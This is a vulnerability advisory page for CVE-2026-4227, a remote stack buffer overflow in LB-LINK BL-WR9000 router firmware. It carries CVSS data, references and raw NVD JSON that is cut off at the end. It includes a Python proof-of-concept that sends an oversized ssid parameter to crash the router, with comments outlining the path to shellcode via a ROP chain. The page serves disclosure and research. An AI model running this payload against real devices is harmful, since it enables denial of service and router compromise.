CVE-2026-4227

Description

A security vulnerability has been detected in LB-LINK BL-WR9000 2.4.9. The impacted element is the function sub_44D844 of the file /goform/get_hidessid_cfg. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:* - NOT VULNERABLE

LB-LINK BL-WR9000 固件版本 <= 2.4.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-4227 PoC - LB-LINK BL-WR9000 Buffer Overflow
# Target: /goform/get_hidessid_cfg
# Vulnerability: Stack buffer overflow in sub_44D844 function

target_ip = "192.168.1.1"  # Router IP
target_port = 80

# Construct malicious payload - 512 bytes to trigger overflow
# Padding to reach return address on stack
padding = b'A' * 512

# Optional: Add shellcode or ROP chain here for exploitation
# For demonstration, using pattern to identify offset

url = f"http://{target_ip}:{target_port}/goform/get_hidessid_cfg"

params = {
    "ssid": padding.decode('latin-1')  # Trigger buffer overflow
}

try:
    print(f"[*] Sending exploit payload to {url}")
    print(f"[*] Payload length: {len(padding)} bytes")
    
    response = requests.get(url, params=params, timeout=5)
    print(f"[+] Response status: {response.status_code}")
    
except requests.exceptions.Timeout:
    print("[!] Request timed out - possible successful exploitation")
except requests.exceptions.ConnectionError:
    print("[!] Connection failed - device may be crashed or patched")
except Exception as e:
    print(f"[-] Error: {e}")

# Note: This PoC demonstrates the vulnerability. Full exploitation requires:
# 1. Identifying exact offset to EIP
# 2. Building ROP chain to bypass ASLR/NX
# 3. Deploying appropriate shellcode for MIPS architecture

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4227
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4227
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4227/
[4] VulDB https://vuldb.com/cve/CVE-2026-4227
[5] https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_HideSSID%20stack%20overflow_EN.md
[6] https://vuldb.com/?ctiid.351150
[7] https://vuldb.com/?id.351150
[8] https://vuldb.com/?submit.771209

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4227", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:15.770", "lastModified": "2026-03-20T18:20:28.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in LB-LINK BL-WR9000 2.4.9. The impacted element is the function sub_44D844 of the file /goform/get_hidessid_cfg. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en LB-LINK BL-WR9000 2.4.9. El elemento afectado es la función sub_44D844 del archivo /goform/get_hidessid_cfg. La manipulación conduce a un desbordamiento de búfer. Es posible iniciar el ataque remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. Se contactó con el proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:*", "matchCriteriaId": "0A23AFF5-C85A-4422-933E-02547D9E2859"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:*", "matchCriteriaId": "29EAB380-0F6C-4E9A-B7DA-5C36021E4175"}]}]}], "references": [{"url": "https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_HideSSID%20stack%20overflow_EN.md", "source": "[email protected]", "tags" ... (truncated)